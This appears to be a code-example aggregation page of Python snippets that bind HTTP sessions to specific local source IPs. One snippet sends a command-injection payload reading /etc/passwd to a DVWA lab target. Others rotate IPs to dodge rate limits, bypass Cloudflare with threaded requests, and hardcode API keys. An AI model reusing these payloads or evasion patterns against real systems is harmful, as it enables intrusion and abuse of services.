Ejemplo n.º 1
0
def GetExternalIP():
    """Look up this host's external IP via api.ipify.org and build a
    Cloudflare DNS record payload from it.

    The lookup is bound to the interface given by configs['INTERNAL_IP'].

    Returns:
        dict with 'type', 'name', 'content' (the external IP) and 'proxied'
        keys, or None when the required config entries are missing.
    """
    external_ip_url = 'https://api.ipify.org/?format=json'
    # Bug fix: the original only assigned cfjson inside the if-branch, so a
    # missing config entry raised NameError at the return statement.
    cfjson = None
    if configs['INTERNAL_IP'] and configs['CF_TYPE'] and configs['CF_NAME']:
        ip = int()  # stays 0 if the lookup below fails
        try:
            session = requests.Session()
            # Force outgoing requests through the configured internal IP.
            adapter = source.SourceAddressAdapter(configs['INTERNAL_IP'])
            session.mount('http://', adapter)
            session.mount('https://', adapter)
            resp = session.get(external_ip_url)
            session.close()
            ip = resp.json()['ip']
        except urllib3.exceptions.ProtocolError as de:
            print("[IPTOCF] urllib3 ERROR: {}".format(de))
        except requests.exceptions.ConnectionError as ce:
            print("[IPTOCF] requests ERROR: {}".format(ce))
        except TypeError as t:
            print("[IPTOCF] TypeError ERROR: {}".format(t))
        except AssertionError as a:
            print("[IPTOCF] AssertionError ERROR: {}".format(a))
        # NOTE(review): on lookup failure this still builds a payload with
        # content 0 — matches the original behavior; confirm callers check it.
        cfjson = {
            'type': configs['CF_TYPE'],
            'name': configs['CF_NAME'],
            'content': ip,
            'proxied': True
        }
    return cfjson
Ejemplo n.º 2
0
def initial_requests_session(ip,
                             header=None,
                             proxy=None,
                             user='******',
                             password='******',
                             verify=False,
                             auth=None,
                             retries=1):
    """Build a requests.Session whose traffic originates from *ip*, then
    issue two probe GETs through a fixed forward proxy and return the session.

    NOTE(review): header/proxy/user/password/verify/auth/retries are accepted
    but not wired up in the body — confirm intended before relying on them.
    """
    session = requests.Session()
    # Bind the session's outbound socket to the given source address.
    adapter = source.SourceAddressAdapter(ip)  # max_retries=retries not wired up
    for scheme in ('http://', 'https://'):
        session.mount(scheme, adapter)
    session.headers = {'User-Agent': 'zrequest-v1.1'}
    proxy_url = 'http://172.17.33.23:8080'
    session.proxies = {'http': proxy_url, 'https': proxy_url}
    session.verify = 'rootCA.cer'
    result = session.get('https://www.baidu.com')
    result = session.get("http://ntlm_protected_site.com")
    print(result.text)
    return session
Ejemplo n.º 3
0
 def create_session(self):
     """Create an HTTP session whose outbound traffic is bound to a
     randomly chosen local source IP from self.ip_list."""
     # Pick the egress IP for this session.
     egress = source.SourceAddressAdapter(random.choice(self.ip_list))
     http_session = requests.session()
     # Route both plain and TLS traffic through the bound adapter.
     for prefix in ('http://', 'https://'):
         http_session.mount(prefix, egress)
     return http_session
Ejemplo n.º 4
0
    def __init__(self, source_address: str=None):
        """Initialise the client session; when *source_address* is given,
        bind all outbound HTTP(S) traffic to that local address."""
        Session.__init__(self)
        self.logger = create_logger('UpbitAPIClient')

        if source_address:
            self.logger.info("mounted at source address: %s" % source_address)
            adapter = source.SourceAddressAdapter(source_address)
            for scheme in ('http://', 'https://'):
                self.mount(scheme, adapter)
Ejemplo n.º 5
0
 def matches_result(self, request):
     """Resolve the future in *request* and dispatch on its req_type.

     request keys read: 'req' (a future yielding a response), 'req_type',
     'ip_num'. Returns parsed match data, None/[] for known-empty results,
     or the result of a retried request.
     """
     req = request['req']
     try:
         res = req.result()
     except (requests.ConnectionError, requests.Timeout,
             socket.timeout) as e:
         # Transport-level failure: retry the same request.
         return self.retry_request(request)
     if (res.status_code != 200):
         if (res.status_code == 404 and request['req_type'] == 6):
             #not found
             return None
         # Non-200: rebuild the session and rotate to the next source IP.
         self.session = FuturesSession()
         # if last IP cycle through data sources
         if self.ip_num == len(self.ips) - 1:
             if request['req_type'] == 4 or request['req_type'] == 6:
                 # Flip between data sources 4 and 6 — presumably the two
                 # skill-lookup backends; confirm against matches_get.
                 request['req_type'] = (4 if
                                        (request['req_type'] == 6) else 6)
                 self.data_source = request['req_type']
         self.ip_num = (request['ip_num'] + 1) % len(self.ips)
         self.session.mount(
             'http://', source.SourceAddressAdapter(self.ips[self.ip_num]))
         return self.retry_request(request, sleep=1)
     if request['req_type'] == 4:
         return self.parse_skill(res)
     if request['req_type'] == 5:
         return self.parse_dota_max(res)
     if request['req_type'] == 6:
         #switch IPs and wait 0.5 seconds so that it is 1 request per second per IP
         time.sleep(1 / len(self.ips))
         self.ip_num = (request['ip_num'] + 1) % len(self.ips)
         self.session.mount(
             'http://', source.SourceAddressAdapter(self.ips[self.ip_num]))
         return self.parse_opendota_skill(res)
     try:
         matches = res.json()['result']['matches']
     except:
         # Missing or malformed JSON body: req_type 3 treats it as "no
         # matches"; anything else is retried.
         if (request['req_type'] == 3):
             return []
         return self.retry_request(request)
     if len(matches) == 0:
         return self.retry_request(request)
     return matches
Ejemplo n.º 6
0
    def __init__(self, use_ip: str = None):
        """Set up the bot session (optionally source-bound to *use_ip*),
        record the external IP, and install default cookies/headers."""
        self.session = InstabotSession()
        if use_ip is not None:
            # Bind the session's outbound traffic to the requested local IP.
            bound = source.SourceAddressAdapter(use_ip)
            for scheme in ('http://', 'https://'):
                self.session.mount(scheme, bound)

        self.external_ip_address = self._get_external_ip_address()

        self._set_default_cookies()
        self._set_default_headers()
Ejemplo n.º 7
0
 def send_packet(self, methods, *args):
     """Issue one GET or POST per (ip, url, header, data) tuple in *args*,
     binding each request's source address to the given ip and storing the
     response keyed by that ip."""
     for ip, url, header, data in args:
         # Select the NIC: bind the outgoing socket to this source IP.
         bound = source.SourceAddressAdapter(ip)
         self.s.mount('http://', bound)
         self.s.mount('https://', bound)
         if not url.startswith("http"):
             url = "http://" + url
         if methods == "get":
             # Collect the response into the per-IP result map.
             self.get_response[ip] = self.s.get(url, headers=header, timeout=60)
         else:
             self.post_response[ip] = self.s.post(url, headers=header, data=data, timeout=60)
Ejemplo n.º 8
0
def get_session(bind_ip_="", need_tor_=False):
    try:
        session = requests.Session()
        if need_tor_:
            session.proxies = {
                'http': 'socks5://127.0.0.1:9051',
                'https': 'socks5://127.0.0.1:9051'
            }
        if bind_ip_ != "":
            new_source = source.SourceAddressAdapter(bind_ip_)
            session.mount('http://', new_source)
            session.mount('https://', new_source)
        return session
    except Exception as e:
        logger.critical("Cant get new session for IP: " + str(bind_ip_) +
                        "; " + str(e))
Ejemplo n.º 9
0
Archivo: http.py Proyecto: xfnw/bitbot
    def _wrap() -> Response:
        """Execute the closed-over request_obj, following up to 4 redirects,
        and return a project Response with a size-capped body."""
        headers = request_obj.get_headers()

        redirect = 0
        current_url = request_obj.url
        session = requests.Session()
        if not request_obj.bindhost is None:
            # Bind outbound traffic to the configured local address.
            new_source = source.SourceAddressAdapter(request_obj.bindhost)
            session.mount('http://', new_source)
            session.mount('https://', new_source)

        while True:
            if request_obj.check_hostname:
                _assert_allowed(current_url)

            # NOTE(review): get_params is passed without calling — presumably
            # a property or pre-built mapping; confirm on the request class.
            response = session.request(request_obj.method,
                                       current_url,
                                       headers=headers,
                                       params=request_obj.get_params,
                                       data=request_obj.get_body(),
                                       allow_redirects=False,
                                       stream=True,
                                       cookies=request_obj.cookies)

            # Redirects are followed manually so each hop can be re-checked
            # against the hostname allow-list above. Only 301/302 are chased.
            if response.status_code in [301, 302]:
                redirect += 1
                if redirect == 5:
                    raise TooManyRedirectionsError(f"{redirect} redirects")
                else:
                    current_url = response.headers["location"]
                    continue

            # Read at most RESPONSE_MAX bytes; one extra byte proves whether
            # the body was truncated.
            response_content = response.raw.read(RESPONSE_MAX,
                                                 decode_content=True)
            if not response.raw.read(1) == b"":
                raise ValueError("Response too large")
            break

        session.close()

        headers = utils.CaseInsensitiveDict(dict(response.headers))
        our_response = Response(response.status_code,
                                response_content,
                                encoding=response.encoding,
                                headers=headers,
                                cookies=response.cookies.get_dict())
        return our_response
Ejemplo n.º 10
0
def cert_from_crt(crt_id, req_session, src_address):
    """
    Fetch the certificate for *crt_id* from crt.sh through *req_session*,
    with the request source-bound to *src_address*.

    Returns (cert, pem_text, status_code), or (None, None, None) when the
    response body cannot be parsed as a PEM certificate.
    """
    if DEBUG_MODE:
        log(f'Getting cert for crt id {crt_id} with source IP ' + src_address)
    # Bind outgoing HTTPS traffic to the requested local address.
    new_source = source.SourceAddressAdapter(src_address)
    url = CRT_URL + str(crt_id)
    req_session.mount('https://', new_source)
    response = req_session.get(url)
    txt = response.text  # PEM-armoured certificate body (when the id exists)
    error = response.status_code
    try:
        der_bytes = pem.unarmor(txt.encode('utf-8'))[2]
        cert = x509.Certificate.load(der_bytes)
    except Exception:
        # Bug fix: the original bare `except:` also swallowed SystemExit and
        # KeyboardInterrupt; Exception still covers every parse failure here.
        if DEBUG_MODE:
            log(f'Could not get certificate for crt id {crt_id}: error {error}',
                mode='error')
        return None, None, None
    return cert, txt, response.status_code
Ejemplo n.º 11
0
def save_img(url, file_name):
    """Download *url* and save it to *file_name*.

    The request is sent from a randomly chosen local NIC address. The body
    is written to a temp file first and only renamed into place when it
    looks complete (> 10000 bytes).
    """
    # Bug fix: the original docstring was indented 3 spaces while the body
    # used 4, which is an IndentationError in Python.
    target_dir = os.path.dirname(file_name)
    if not os.path.exists(target_dir):  # renamed from `dir` (shadowed builtin)
        os.makedirs(target_dir)
    bind_ip = random.choice(local_ips)  # pick a random local NIC to bind to
    new_src = source.SourceAddressAdapter(bind_ip)
    s.mount('http://', new_src)
    s.mount('https://', new_src)
    pname = current_process().name  # current worker process name
    logger.info('进程:{0} 开始下载-->{1} 流量出口->【{2}】'.format(pname, url, bind_ip))
    res = s.get(url)
    if res.status_code != 200:
        logger.info('进程:{0} 下载失败-->{1}, code:{2}'.format(pname, url, res.status_code))
    file_tmp = file_name + '_tmp'
    with open(file_tmp, 'wb') as f:
        f.write(res.content)
        try:
            size = os.path.getsize(file_tmp)
            if size > 10000:    # crude completeness check before rename
                os.rename(file_tmp, file_name)
        except Exception as e:
            # Bug fix: logging.error('保存失败-->', url) passed url as a
            # %-format argument with no placeholder (and bypassed the module
            # logger); log through `logger` with proper placeholders.
            logger.error('保存失败-->%s: %s', url, e)
    logger.info('进程:{0} 下载完成-->{1}'.format(pname, file_name))
Ejemplo n.º 12
0
r = requests.get(dvwa_login_url, auth=(dvwa_username, dvwa_password))
dvwa_cookie = r.cookies

print("DVWA Cookie")
print dvwa_cookie

print("DVWA Header")
print r.headers

counter = 0
#r1.headers = {url1, 'user-agent': ua1, ''}
while 1:
    # Attack Only traffic
    if counter >= 100:
        s1 = requests.Session()
        ip1 = source.SourceAddressAdapter(random.choice(IP_ADDR))
        s1.mount("http://", ip1)
        s1.mount("https://", ip1)
        cur_url = random.choice(attack_url)
        if cur_url == url5:
            try:
                r1 = s1.post(cur_url,
                             headers={'user-agent': random.choice(ua)},
                             cookies=dvwa_cookie,
                             data={
                                 "ip": "ping 127.0.0.1 & cat /etc/passwd",
                                 "Submit": "Submit"
                             })
                if r1.status_code == 200:
                    print("Command execution detected")
                elif r1.status_code == 403:
Ejemplo n.º 13
0
class Dota_API():
    """Async Dota 2 match scraper.

    Issues concurrent requests via a FuturesSession bound to one of several
    local source IPs, rotating IPs and data sources on failures. All state
    below is class-level and therefore shared by every instance.
    """
    # Steam Web API keys; which one is used is fixed by api_key_num.
    api_keys = [
        'FE70CE9FC0D6D99279498CE852587F59', '2FEC67172AAC0C393EC209A225A7E51E'
    ]
    api_key_num = 1
    api_key = api_keys[api_key_num]

    # Local source IPs rotated between requests (1 req/sec per IP, see
    # matches_result).
    ips = ['162.213.199.143', '162.213.199.31']
    ip_num = 0

    # Current skill-data source: req_type 4 or 6 (toggled on failure).
    data_source = 4

    headers = {'User-Agent': 'Script by Grue'}

    errors = 0  # running count of retried requests

    # Shared session, source-bound to the first IP at class definition time.
    session = FuturesSession()
    session.mount('http://', source.SourceAddressAdapter(ips[ip_num]))

    def matches_get(self, req_type=1, n_id='', **kwargs):
        """Fire an async GET for *n_id* on the endpoint selected by
        req_type (1-3: Steam Web API; 4: dotabuff; 5: dotamax;
        6: opendota) and return a request-descriptor dict for
        matches_result."""
        if (req_type < 4):
            url = 'https://api.steampowered.com/IDOTA2Match_570/'
            url += 'GetMatchHistoryBySequenceNum' if req_type == 1 else 'GetMatchHistory'
            url += '/V001/?key=' + self.api_key + '&min_players=10&'
            if (req_type == 1):
                url += 'start_at_match_seq_num'
            elif (req_type == 2):
                url += 'start_at_match_id'
            elif (req_type == 3):
                url += 'account_id'
            url += '=' + str(n_id)
            if req_type != 1:
                url += '&skill=3'
        elif req_type == 4:
            url = 'http://www.dotabuff.com/matches/' + str(n_id)
        elif req_type == 5:
            url = 'http://dotamax.com/match/detail/' + str(n_id)
        elif req_type == 6:
            url = 'http://api.opendota.com/api/matches/' + str(n_id)
        return dict(req=self.session.get(url, timeout=7, headers=self.headers),
                    req_type=req_type,
                    n_id=n_id,
                    url=url,
                    ip_num=self.ip_num)

    def matches_result(self, request):
        """Resolve the future in *request* and dispatch on its req_type;
        retries on transport errors and non-200 responses, rotating
        source IPs (and data source when the last IP failed)."""
        req = request['req']
        try:
            res = req.result()
        except (requests.ConnectionError, requests.Timeout,
                socket.timeout) as e:
            # Transport-level failure: retry the same request.
            return self.retry_request(request)
        if (res.status_code != 200):
            if (res.status_code == 404 and request['req_type'] == 6):
                #not found
                return None
            # Non-200: rebuild the session and rotate to the next source IP.
            self.session = FuturesSession()
            # if last IP cycle through data sources
            if self.ip_num == len(self.ips) - 1:
                if request['req_type'] == 4 or request['req_type'] == 6:
                    # Flip between the dotabuff (4) and opendota (6) sources.
                    request['req_type'] = (4 if
                                           (request['req_type'] == 6) else 6)
                    self.data_source = request['req_type']
            self.ip_num = (request['ip_num'] + 1) % len(self.ips)
            self.session.mount(
                'http://', source.SourceAddressAdapter(self.ips[self.ip_num]))
            return self.retry_request(request, sleep=1)
        if request['req_type'] == 4:
            return self.parse_skill(res)
        if request['req_type'] == 5:
            return self.parse_dota_max(res)
        if request['req_type'] == 6:
            #switch IPs and wait 0.5 seconds so that it is 1 request per second per IP
            time.sleep(1 / len(self.ips))
            self.ip_num = (request['ip_num'] + 1) % len(self.ips)
            self.session.mount(
                'http://', source.SourceAddressAdapter(self.ips[self.ip_num]))
            return self.parse_opendota_skill(res)
        try:
            matches = res.json()['result']['matches']
        except:
            # Missing or malformed JSON body: req_type 3 treats it as "no
            # matches"; anything else is retried.
            if (request['req_type'] == 3):
                return []
            return self.retry_request(request)
        if len(matches) == 0:
            return self.retry_request(request)
        return matches

    def retry_request(self, request, sleep=7):
        """Sleep, re-issue the original request (matches_get keyword
        round-trip) and resolve it; bumps the error counter."""
        #print(request)
        self.errors += 1
        time.sleep(sleep)
        return self.matches_result(self.matches_get(**request))

    def parse_skill(self, response):
        """Extract the skill label from a dotabuff match page, or None
        if the expected markers are absent."""
        html = response.text
        end_index = html.find(' Skill</dd>')
        if end_index > -1:
            html = html[:end_index]
        else:
            return None
        start_index = html.rfind('<dd>')
        if start_index > -1:
            html = html[start_index + 4:]
        else:
            return None
        return html

    def parse_dota_max(self, response):
        """Extract the highlighted value from a dotamax match page, or
        None if the expected markers are absent."""
        html = response.text
        html_split = html.split('<td><font style="color: #f0a868;">')
        if len(html_split) > 1:
            html = html_split[1]
        else:
            return None
        html_split = html.split('</font></td>')
        if len(html_split) > 1:
            html = html_split[0]
        else:
            return None
        return html

    def parse_opendota_skill(self, response):
        """Return the 'skill' field of an opendota match JSON ('Very High'
        for level 3), or None when absent."""
        m = response.json()
        if 'skill' not in m:
            return None
        if m['skill'] == 3:
            return 'Very High'
        return m['skill']
Ejemplo n.º 14
0
def gen_session(ip):
    """Return a requests.Session whose outbound traffic originates
    from the local address *ip*."""
    bound = source.SourceAddressAdapter(ip)
    session = requests.Session()
    for scheme in ('http://', 'https://'):
        session.mount(scheme, bound)
    return session
Ejemplo n.º 15
0
except:
    print "Invalid ip address"
    sys.exit(0)

# NOTE(review): Python 2 script (print statements). ip_bits and host_bit are
# presumably parsed from sys.argv[1] above this chunk — confirm in full file.
try:
    no_of_ip = int(sys.argv[2])
except:
    print "Invalid 2nd Argv"
    sys.exit(0)
# Build no_of_ip consecutive addresses in the same /24 starting at host_bit.
iplist = []
for i in range(0, no_of_ip):
    iplist.append(ip_bits[0] + '.' + ip_bits[1] + '.' + ip_bits[2] + '.' +
                  str(host_bit + i))

for (x, source_ip) in enumerate(iplist):

    scraper = cfscrape.create_scraper()  # returns a CloudflareScraper instance
    # Or: scraper = cfscrape.CloudflareScraper()  # CloudflareScraper inherits from requests.Session
    # Bind this scraper's outbound traffic to source_ip.
    new_source = source.SourceAddressAdapter(source_ip)
    scraper.mount('http://', new_source)
    scraper.mount('https://', new_source)
    print scraper.get("http://tamilrockers.lv").request.headers

    # Second, session-backed scraper sharing the same source adapter.
    session = requests.session()
    scraper1 = cfscrape.create_scraper(sess=session)
    scraper1.mount('http://', new_source)
    scraper1.mount('https://', new_source)
    # Spawn sys.argv[3] worker threads per source IP.
    for i in range(int(sys.argv[3])):
        t2 = threading.Thread(target=process, args=(scraper1, source_ip))
        t2.start()
Ejemplo n.º 16
0
                        type=int, default=10000)
    parser.add_argument('-t', '--threads', help="Number of parallel threads to send queries from", type=int, default=25)
    args = parser.parse_args()

    domains = args.domains.readlines()
    resolvers = args.resolvers.readlines()

    logging.basicConfig(level=logging.WARNING, filename=f"{args.output}.log", filemode='w',
                        format="%(asctime)s:  %(message)s")
    reader = PktReader(write_mode='file', out_file=f"{args.output}.pcap",
                       pkt_filter=f'host {args.ip} and tcp port 443', interface="ens33", unique_out_file_name=False)
    reader.start()

    # send traffic out specified IP for filtering
    session = requests.Session()
    s = source.SourceAddressAdapter(args.ip)
    session.mount('http://', s)
    session.mount('https://', s)

    queries = []

    print("Generating queries...")
    for i in range(args.num_samples):
        web_args = {"num": i, "type": "web", "domain": random.choice(domains).strip(), "resolver": ""}
        doh_args = {"num": i, "type": "doh", "domain": random.choice(domains).strip(),
                    "resolver": random.choice(resolvers).strip()}
        if random.random() < 0.5:
            queries.append(web_args)
            queries.append(doh_args)
        else:
            queries.append(doh_args)
Ejemplo n.º 17
0
def simulate(request, robotid=None, action=None, tray=None, line=None):
    """
    Simulates a robot sending movements.
    It is intended for testing the behaviour of the application when
    a protocol running on a robot notfies sample moves to the system.
    It uses the current session as storage.
    For this to work, robots MUST (RFC 2119) be "virtual" ones,
    i.e. they should have IP addresses that are valid only in the server
    that is executing the movement simulation.
    The tested approach creates a virtual network interface and adds
    private IPv6 addresses (ff00/8) for each robot on it. This requires
    that the server also has an IPv6 address (could also be added on the
    virtual interface).
    """

    import json

    robots = Robot.objects.all()
    # Start of simulation
    if request.method == 'GET' and not robotid:
        return render(request, 'tracing/simulate.html', {'robots': robots})

    # Robot selection
    if request.method == 'POST' and not robotid:
        robotid = request.POST.get('robotid', None)
        if not robotid:
            return HttpResponseRedirect(reverse('tracing:simulate'))
        return HttpResponseRedirect(
            reverse('tracing:simulate', kwargs={'robotid': robotid}))

    # We are acting on a certain robot, there MUST (RFC2119) be a robotid
    # If there is no id for the robot, this smells fishy
    if not robotid: return HttpResponseForbidden()

    # Only GET or POST accepted here
    if not request.method in ['GET', 'POST']: return HttpResponseForbidden()

    # Simulation for a given robot, so we need to load the robot proper
    # Robot should exist, but ...
    robot = get_object_or_404(Robot, id=robotid)
    # Do we have work for this robot?
    # Pending moves are kept in the session as a JSON string per robot id.
    moves = request.session.get('simmov{}'.format(robot.id), '[]')
    moves = json.loads(moves)
    # Get the trays and racks for displaying
    trays = []
    grids = {}
    for rack in robot.rack_set.all():
        trays.append(rack.position)
        grids[rack.position] = populate(rack)

    # No action requested, present the robot
    if not action:
        return render(
            request, 'tracing/simulate.html', {
                'robots': robots,
                'robot': robot,
                'trays': trays,
                'grids': grids,
                'moves': moves
            })

    # Add move
    if action == 'a':
        # Get data from "movement" form
        move = {'source': {}, 'destination': {}}
        move['source']['tray'] = request.POST.get('stray', False)
        move['source']['row'] = request.POST.get('srow', False)
        move['source']['col'] = request.POST.get('scol', False)
        move['destination']['tray'] = request.POST.get('dtray', False)
        move['destination']['row'] = request.POST.get('drow', False)
        move['destination']['col'] = request.POST.get('dcol', False)
        # All six fields are required; POST.get returns False when missing.
        if (not move['source']['tray'] or not move['source']['row']
                or not move['source']['col'] or not move['destination']['tray']
                or not move['destination']['row']
                or not move['destination']['col']):
            messages.error(request, _('Movement information was incorrect'))
        else:
            moves.append(move)

    # Clear pending movements
    if action == 'c': moves = []

    # Execute pending moves
    if action == 'm':
        # This is the only place where we need requests
        import requests
        # We need to change the source address
        from requests_toolbelt.adapters import source
        # We need a session
        s = requests.Session()
        # No proxies needed
        s.trust_env = False
        # We use our own server name, from the authorized names in the list
        # but avoiding localhost, it has to be routeable somehow.
        # NOTE(review): if ALLOWED_HOSTS is empty, `name` below is unbound;
        # if all entries are local, the last one is used. Confirm settings.
        for name in settings.ALLOWED_HOSTS:
            if not name in ['127.0.0.1', '::1', 'localhost']: break

        # Mount the robot's IP as the source address only for our own host,
        # so the POST appears to come from the robot itself.
        s.mount('http://{}'.format(name),
                source.SourceAddressAdapter(robot.ip))
        u = 'http://{}{}{}'.format(name,
                                   request.path.replace(request.path_info, ''),
                                   reverse('tracing:movesample'))
        r = s.post(u, json=moves)
        if not r.status_code == 200:
            # Something went wrong
            messages.error(request, _('Moves failed: {}').format(r.reason))
        else:
            # Clear the moves
            moves = []

    # Finally, we update the session and re-paint the robot
    request.session['simmov{}'.format(robot.id)] = json.dumps(moves)
    return HttpResponseRedirect(
        reverse('tracing:simulate', kwargs={'robotid': robotid}))